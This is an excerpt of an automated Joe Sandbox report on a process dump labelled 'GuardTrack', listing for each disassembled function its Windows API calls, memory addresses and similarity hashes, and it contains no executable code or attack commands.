                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                          • String ID:
                                                          • API String ID: 3567560977-0
                                                          • Opcode ID: 492027422665db9b1ffa6f0bf0ef25af68274bf9a79c94b289480ad04ec4706e
                                                          • Instruction ID: 378708609bc89d21dc36c256cb363e3a1f0cbf23c388ac0013815fd71ca6dea2
                                                          • Opcode Fuzzy Hash: 492027422665db9b1ffa6f0bf0ef25af68274bf9a79c94b289480ad04ec4706e
                                                          • Instruction Fuzzy Hash: 81F06D3251A7135AE7347B7CBC0B68A6E96FB81730F20071BF554D63D2EF10884181A1
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,005D4282,?), ref: 005D41D3
                                                          • GetProcAddress.KERNEL32(00000000), ref: 005D41DA
                                                          • EncodePointer.KERNEL32(00000000), ref: 005D41E6
                                                          • DecodePointer.KERNEL32(00000001,005D4282,?), ref: 005D4203
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoInitialize$combase.dll
                                                          • API String ID: 3489934621-340411864
                                                          • Opcode ID: 0c923f104687f191542424febd6046a0e00779f295239e0efe82f0cea68826b2
                                                          • Instruction ID: efc697d37403dc3e176915fd7371b028b26c924b334a2690ceb575a4bdc6ad2c
                                                          • Opcode Fuzzy Hash: 0c923f104687f191542424febd6046a0e00779f295239e0efe82f0cea68826b2
                                                          • Instruction Fuzzy Hash: 68E0E578A90721AFEB206FB4EC4DB083A67BB16B06FA06465B606D61A0CBF54184CF00
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,005D41A8), ref: 005D42A8
                                                          • GetProcAddress.KERNEL32(00000000), ref: 005D42AF
                                                          • EncodePointer.KERNEL32(00000000), ref: 005D42BA
                                                          • DecodePointer.KERNEL32(005D41A8), ref: 005D42D5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoUninitialize$combase.dll
                                                          • API String ID: 3489934621-2819208100
                                                          • Opcode ID: a96cf49650bf592c7beffef85e28bfd3235988b78e2ad752176b3a7d2b19c1e7
                                                          • Instruction ID: eac53b87523e62184b055c8cf87f2a7eb8aeab43a6366e86895f11be23890a49
                                                          • Opcode Fuzzy Hash: a96cf49650bf592c7beffef85e28bfd3235988b78e2ad752176b3a7d2b19c1e7
                                                          • Instruction Fuzzy Hash: C0E0B678950B21ABEB259F60AD0DB453F67BB05B03F902566F206D6AE0CBF44684CE10
                                                          APIs
                                                          • GetClientRect.USER32(?,?), ref: 005B21B8
                                                          • GetWindowRect.USER32(?,?), ref: 005B21F9
                                                          • ScreenToClient.USER32(?,?), ref: 005B2221
                                                          • GetClientRect.USER32(?,?), ref: 005B2350
                                                          • GetWindowRect.USER32(?,?), ref: 005B2369
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Rect$Client$Window$Screen
                                                          • String ID:
                                                          • API String ID: 1296646539-0
                                                          • Opcode ID: 8ac6c7370ef632ac474f8f3d819734769b456d1067e6480c49f5dfd0ecd6eb8c
                                                          • Instruction ID: 2609eba9b393c03c3441a34b09df916d70fe13386d4a5937f754d7e5328eb43f
                                                          • Opcode Fuzzy Hash: 8ac6c7370ef632ac474f8f3d819734769b456d1067e6480c49f5dfd0ecd6eb8c
                                                          • Instruction Fuzzy Hash: D0B1903990024ADBDF14CFA9C5807EEBBB1FF08310F149529ED99EB254DB34AA50CB65
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _memmove$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 3253778849-0
                                                          • Opcode ID: d7c6c313eaf90a61c7f706f7d30033c8ef0e257baeb317b4a95423308137ce43
                                                          • Instruction ID: da685421adadce37019087a056582a0a983c628d93ab4a8f99cd1c4ec6a24e34
                                                          • Opcode Fuzzy Hash: d7c6c313eaf90a61c7f706f7d30033c8ef0e257baeb317b4a95423308137ce43
                                                          • Instruction Fuzzy Hash: 4861D23450064AAFCF21EF64CC89EFE3BA9BF85308F08455AF85557292DB30AD45CB54
                                                          APIs
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                            • Part of subcall function 0063147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0063040D,?,?), ref: 00631491
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0063091D
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0063095D
                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00630980
                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 006309A9
                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 006309EC
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 006309F9
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                          • String ID:
                                                          • API String ID: 4046560759-0
                                                          • Opcode ID: b6e4d129538cfd938cb49d424704e3d6bbfab64b632007717c5fc6901805bf87
                                                          • Instruction ID: a8c7005bdc6ea0b2d5a522d72628fc6aaa7112ec659e6e0f4ef42a07db1aa185
                                                          • Opcode Fuzzy Hash: b6e4d129538cfd938cb49d424704e3d6bbfab64b632007717c5fc6901805bf87
                                                          • Instruction Fuzzy Hash: E0517C31108201AFE714EF64C899EAFBBEAFF85714F04491DF595872A2DB31E905CB92
                                                          APIs
                                                          • GetMenu.USER32(?), ref: 00635E38
                                                          • GetMenuItemCount.USER32(00000000), ref: 00635E6F
                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00635E97
                                                          • GetMenuItemID.USER32(?,?), ref: 00635F06
                                                          • GetSubMenu.USER32(?,?), ref: 00635F14
                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00635F65
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountMessagePostString
                                                          • String ID:
                                                          • API String ID: 650687236-0
                                                          • Opcode ID: bbe133144dc144edf18b47039c4c0d177717108fc1dad0e6b1fdfc47912e77fd
                                                          • Instruction ID: 05922817a79a5f27718bfc49e704d251eacec1dac9f092b106e4031d0ce2b4a8
                                                          • Opcode Fuzzy Hash: bbe133144dc144edf18b47039c4c0d177717108fc1dad0e6b1fdfc47912e77fd
                                                          • Instruction Fuzzy Hash: D8518D75A01626EFDB11EF64C845AEEBBB6EF48310F104059E912BB391CB34AE418FD1
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 0060F6A2
                                                          • VariantClear.OLEAUT32(00000013), ref: 0060F714
                                                          • VariantClear.OLEAUT32(00000000), ref: 0060F76F
                                                          • _memmove.LIBCMT ref: 0060F799
                                                          • VariantClear.OLEAUT32(?), ref: 0060F7E6
                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0060F814
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                          • String ID:
                                                          • API String ID: 1101466143-0
                                                          • Opcode ID: a7911a77d35c677b613f4d60c9009f599967aa19cee8aae7d3afc17fffd4b1a2
                                                          • Instruction ID: 863ec320f9488a17dd0cc90a8bcde722c04118aa69a5a2b94f9ac7ac4abd4181
                                                          • Opcode Fuzzy Hash: a7911a77d35c677b613f4d60c9009f599967aa19cee8aae7d3afc17fffd4b1a2
                                                          • Instruction Fuzzy Hash: 7F515E79A00209EFDB24CF58D884AAAB7F9FF4C314B15856AE959DB341E730E911CF90
                                                          APIs
                                                          • _memset.LIBCMT ref: 006129FF
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00612A4A
                                                          • IsMenu.USER32(00000000), ref: 00612A6A
                                                          • CreatePopupMenu.USER32 ref: 00612A9E
                                                          • GetMenuItemCount.USER32(000000FF), ref: 00612AFC
                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00612B2D
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                          • String ID:
                                                          • API String ID: 3311875123-0
                                                          • Opcode ID: 5a71fdc8ecc2f6781e1efacb466007f31c5794da3b556084ed21f6b64f7b27b4
                                                          • Instruction ID: 6417183ab6cb0b546a64018fa944d3575b22d98128a1f6ac464a203d1c8299e1
                                                          • Opcode Fuzzy Hash: 5a71fdc8ecc2f6781e1efacb466007f31c5794da3b556084ed21f6b64f7b27b4
                                                          • Instruction Fuzzy Hash: 3051CE7060424BDFDF24CF68D898AEEBBF6EF05318F184119E8119B2A0D77099A5CB51
                                                          APIs
                                                            • Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3
                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 005B1B76
                                                          • GetWindowRect.USER32(?,?), ref: 005B1BDA
                                                          • ScreenToClient.USER32(?,?), ref: 005B1BF7
                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 005B1C08
                                                          • EndPaint.USER32(?,?), ref: 005B1C52
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                          • String ID:
                                                          • API String ID: 1827037458-0
                                                          • Opcode ID: c0dc28782bfcb90a609f0aa6796287395043d5a42b0b581110fde57f28d742cf
                                                          • Instruction ID: b5decd72911a26c68cd147d08d0a18648605a4da09dc55e20830e8db3aad84f9
                                                          • Opcode Fuzzy Hash: c0dc28782bfcb90a609f0aa6796287395043d5a42b0b581110fde57f28d742cf
                                                          • Instruction Fuzzy Hash: 4841D230104701AFE711DF24CC98FA67FF9FB4A321F140568FA99872A2C730A844DB62
                                                          APIs
                                                          • ShowWindow.USER32(006777B0,00000000,00FF5C60,?,?,006777B0,?,0063BC1A,?,?), ref: 0063BD84
                                                          • EnableWindow.USER32(?,00000000), ref: 0063BDA8
                                                          • ShowWindow.USER32(006777B0,00000000,00FF5C60,?,?,006777B0,?,0063BC1A,?,?), ref: 0063BE08
                                                          • ShowWindow.USER32(?,00000004,?,0063BC1A,?,?), ref: 0063BE1A
                                                          • EnableWindow.USER32(?,00000001), ref: 0063BE3E
                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0063BE61
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$Show$Enable$MessageSend
                                                          • String ID:
                                                          • API String ID: 642888154-0
                                                          • Opcode ID: 762115a13a48199f37f3e018e924e43d7021e6d8fb0a1d1cd60815f8965d4acc
                                                          • Instruction ID: 479743f00ed48823b49fe8c1bbf5654d4e5ad4a9ea18d8497d0cfbc2300dc4ba
                                                          • Opcode Fuzzy Hash: 762115a13a48199f37f3e018e924e43d7021e6d8fb0a1d1cd60815f8965d4acc
                                                          • Instruction Fuzzy Hash: AC416C35600154AFDB22CF28C489BD47BE2FF46314F1851A9EB498F3A2CB31A845CB91
                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,0062550C,?,?,00000000,00000001), ref: 00627796
                                                            • Part of subcall function 0062406C: GetWindowRect.USER32(?,?), ref: 0062407F
                                                          • GetDesktopWindow.USER32 ref: 006277C0
                                                          • GetWindowRect.USER32(00000000), ref: 006277C7
                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 006277F9
                                                            • Part of subcall function 006157FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00615877
                                                          • GetCursorPos.USER32(?), ref: 00627825
                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00627883
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                          • String ID:
                                                          • API String ID: 4137160315-0
                                                          • Opcode ID: acfd064275dc6c2e56d7e91463701b68f407059921b3db80bc1ceaceec8f5587
                                                          • Instruction ID: facf59c6e8cf24d19879057e33ccaa23041c34a67fcae62dea267074cbd06ca5
                                                          • Opcode Fuzzy Hash: acfd064275dc6c2e56d7e91463701b68f407059921b3db80bc1ceaceec8f5587
                                                          • Instruction Fuzzy Hash: 6931F272108325ABD720DF14D849F9BB7EAFF89314F000929F59597181CB34E948CF92
                                                          APIs
                                                            • Part of subcall function 00608CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00608CDE
                                                            • Part of subcall function 00608CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00608CE8
                                                            • Part of subcall function 00608CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00608CF7
                                                            • Part of subcall function 00608CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00608CFE
                                                            • Part of subcall function 00608CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00608D14
                                                          • GetLengthSid.ADVAPI32(?,00000000,0060904D), ref: 00609482
                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0060948E
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00609495
                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 006094AE
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,0060904D), ref: 006094C2
                                                          • HeapFree.KERNEL32(00000000), ref: 006094C9
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                          • String ID:
                                                          • API String ID: 3008561057-0
                                                          • Opcode ID: 05c87ee6e26792c187dc9e7c8a48c329f00dac8e2b14b0ea58b45d5a0d0d1526
                                                          • Instruction ID: 62ad042014df990ddccd186c910d7981e9b977f59fa51d7b285023dc65dca56d
                                                          • Opcode Fuzzy Hash: 05c87ee6e26792c187dc9e7c8a48c329f00dac8e2b14b0ea58b45d5a0d0d1526
                                                          • Instruction Fuzzy Hash: 1811DC36540204FFEB189FA4CC09BEF7BBBEB42312F108058E98193251C7369902CB60
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00609200
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00609207
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00609216
                                                          • CloseHandle.KERNEL32(00000004), ref: 00609221
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00609250
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00609264
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
                                                          • API String ID: 1413079979-0
                                                          • Opcode ID: 275b71f71937693b3c0660f6e1ed595669598cb00022685ea0a7f8956247e61e
                                                          • Instruction ID: 3d4d15d247e77ccaba001ac2aa5ff16648a84f4234e27b146e15d97249f076fb
                                                          • Opcode Fuzzy Hash: 275b71f71937693b3c0660f6e1ed595669598cb00022685ea0a7f8956247e61e
                                                          • Instruction Fuzzy Hash: 5B11597654120EBBEF118F94ED49FDE7BAAEF09704F044054FE04A21A1C3769E61EB61
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 0060C34E
                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0060C35F
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0060C366
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0060C36E
                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0060C385
                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0060C397
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CapsDevice$Release
                                                          • String ID:
                                                          • API String ID: 1035833867-0
                                                          • Opcode ID: ce604f5a0c6838c9e96a1f690384cc255eabc4e87b2cbd6f6d133603cdd3e615
                                                          • Instruction ID: 6bca91afbd025e8bb0234de54cb904b66dff99c6a7eb650c1a6ea0e910b4d9df
                                                          • Opcode Fuzzy Hash: ce604f5a0c6838c9e96a1f690384cc255eabc4e87b2cbd6f6d133603cdd3e615
                                                          • Instruction Fuzzy Hash: 48014475E40218BBEF149BA59C49B9EBFB9EF49761F004065FF08A7280D6719D10CFA0
                                                          APIs
                                                            • Part of subcall function 005B16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005B1729
                                                            • Part of subcall function 005B16CF: SelectObject.GDI32(?,00000000), ref: 005B1738
                                                            • Part of subcall function 005B16CF: BeginPath.GDI32(?), ref: 005B174F
                                                            • Part of subcall function 005B16CF: SelectObject.GDI32(?,00000000), ref: 005B1778
                                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0063C57C
                                                          • LineTo.GDI32(00000000,00000003,?), ref: 0063C590
                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0063C59E
                                                          • LineTo.GDI32(00000000,00000000,?), ref: 0063C5AE
                                                          • EndPath.GDI32(00000000), ref: 0063C5BE
                                                          • StrokePath.GDI32(00000000), ref: 0063C5CE
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                          • String ID:
                                                          • API String ID: 43455801-0
                                                          • Opcode ID: 4131e19b517348329824ee8365affef25b321f1c56117c962820cee2f9da8116
                                                          • Instruction ID: f0846ca11bdf90781d7878939395de274d5a9a8efe6a5b309a05397508ca5d84
                                                          • Opcode Fuzzy Hash: 4131e19b517348329824ee8365affef25b321f1c56117c962820cee2f9da8116
